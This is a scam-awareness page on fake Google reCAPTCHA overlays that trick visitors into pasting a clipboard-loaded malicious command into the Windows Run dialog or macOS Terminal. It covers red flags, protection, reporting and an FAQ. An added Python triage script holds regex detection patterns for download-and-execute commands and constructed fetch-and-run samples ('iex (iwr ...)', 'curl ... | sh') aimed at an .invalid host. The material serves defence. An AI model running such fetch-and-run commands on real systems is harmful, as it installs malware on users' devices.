Fake Google reCAPTCHA Malware Scam
Fraudulent websites display a lookalike Google reCAPTCHA challenge and instruct visitors to paste a malicious command, already placed in their clipboard, into the Windows Run dialog or macOS Terminal to 'verify they are human', silently installing malware on their device.
Part of: Fake CAPTCHA Malware Scams
Last reviewed: 8 June 2026
Google's reCAPTCHA is one of the most widely recognised security elements on the internet. Billions of users have clicked 'I am not a robot' or completed image-grid challenges, conditioning people to comply with reCAPTCHA prompts without question.
Criminals exploit this conditioned trust by creating fake verification overlays that mimic reCAPTCHA's appearance exactly — the Google logo, the tick-box, the recognisable branding. The twist is that instead of a normal image challenge, the fake CAPTCHA instructs the visitor to open the Windows Run dialog or macOS Terminal and paste a command 'to complete verification'.
The clipboard has already been silently loaded with a malicious PowerShell or shell command. When the victim pastes and runs it, the command downloads and executes malware, often an infostealer or remote access trojan, with no further interaction required.
How this scam abuses the Google brand
Real Google reCAPTCHA challenges operate entirely within the browser — they never ask users to open external applications, paste commands, or interact with the operating system. The verification process is invisible to users most of the time, or at most requires clicking a checkbox or selecting images.
The scam typically appears when a victim visits a piracy site, a malicious ad redirect, or a compromised legitimate site. A full-screen overlay declares 'Verify you are human — Google reCAPTCHA required'. After the user clicks the checkbox, a second step appears: 'To complete verification, press Win+R, paste the following code, and press Enter'. The pasted command is a long Base64-encoded PowerShell string that silently fetches and runs a malware payload.
On macOS the instruction is adapted to open Spotlight or Terminal. The fake Google branding makes the entire sequence feel like a legitimate browser security measure rather than a social-engineering attack.
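For defenders triaging a command recovered from a user's clipboard or Run history, the following added example (not part of the original page) decodes a Base64 -EncodedCommand argument and flags the fetch-and-run traits described above. The indicator names, regular expressions and sample strings are assumptions constructed for illustration, not a complete rule set.

```python
import base64
import re

# Heuristic indicators (assumptions for this example, not an exhaustive detection rule set).
INDICATORS = {
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "download": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget|downloadstring)\b", re.I),
    "execute_fetched": re.compile(r"\b(iex|invoke-expression)\b|\|\s*(ba|z)?sh\b", re.I),
}
# Common spellings of PowerShell's -EncodedCommand switch, followed by a Base64 blob.
ENCODED_ARG = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmd):
    """Return the script hidden in an -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers malformed Base64 and invalid UTF-16LE
        return None


def triage(cmd):
    """Return the sorted indicator names found in the command and in any decoded payload."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if decoded is not None:
        hits.add("encoded_command")
    return sorted(hits)


def build_sample():
    """Constructed sample shaped like the pasted string; the host is a reserved .invalid name."""
    inner = "iex (iwr 'https://example.invalid/verify')"
    blob = base64.b64encode(inner.encode("utf-16-le")).decode()
    return f"powershell -enc {blob}"


if __name__ == "__main__":
    print(triage(build_sample()))
    print(triage("curl -s https://example.invalid/v | sh"))  # constructed macOS-style sample
    print(triage("ipconfig /all"))                            # benign command, no indicators
```

Without the decoding step, the encoded sample would match only the "powershell" indicator, because the download and execution keywords exist only inside the Base64 blob.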
Common red flags
- A CAPTCHA asks you to open a system application such as Run, Terminal, or PowerShell — real reCAPTCHA never does this.
- You are told to paste something from your clipboard to 'complete verification' — this is not part of any legitimate browser check.
- The Google logo appears on a page you reached via an unexpected redirect or a suspicious-looking URL.
- The verification overlay fills the entire browser screen and cannot be closed.
- The URL in the address bar is not a known legitimate site, even though the reCAPTCHA branding looks authentic.
- After following the instruction your browser or system behaves unusually — high CPU, unexpected network activity.
How to protect yourself
- Never open Run, Terminal, or PowerShell at the instruction of a website — legitimate browser checks do not require this.
- Use an ad-blocking browser extension and a reputable DNS filter to reduce exposure to malicious redirect chains.
- If you pasted and ran a command, disconnect from the internet immediately, run a full malware scan, and change passwords for any accounts accessed on that device.
- Keep your operating system and browser up to date to limit the impact of any malware that does execute.
- Enable browser-based Safe Browsing protections in Chrome at Settings > Privacy and Security > Security > Enhanced protection.
- Use a standard user account rather than an administrator account for daily browsing to limit malware's system access.
How to report it
- Report the malicious URL to Google Safe Browsing at safebrowsing.google.com/safebrowsing/report_phish/.
- Submit the malware sample to VirusTotal at virustotal.com for broader community protection.
- Report to the FTC at ReportFraud.ftc.gov (US), Action Fraud actionfraud.police.uk (UK), or your national cybercrime unit.
- If the site appeared in a Google Search result, use the 'Report' option on that result.
Frequently asked questions
Does any legitimate website ever ask me to open Terminal or Run to pass a CAPTCHA?
No. No legitimate CAPTCHA service — including Google reCAPTCHA — ever asks you to open a command-line application or paste anything into it. Any site making this request is attempting to run malware on your device.
I pasted the command but did not press Enter. Am I safe?
Likely yes, as long as you did not execute the command. Close the terminal window without pressing Enter, clear your clipboard, and run a full antivirus scan as a precaution.
How do criminals get the malicious command into my clipboard silently?
Malicious JavaScript on the page uses the Clipboard API to overwrite your clipboard contents when you interact with the page — for example, when you click the fake checkbox. This happens invisibly in the background.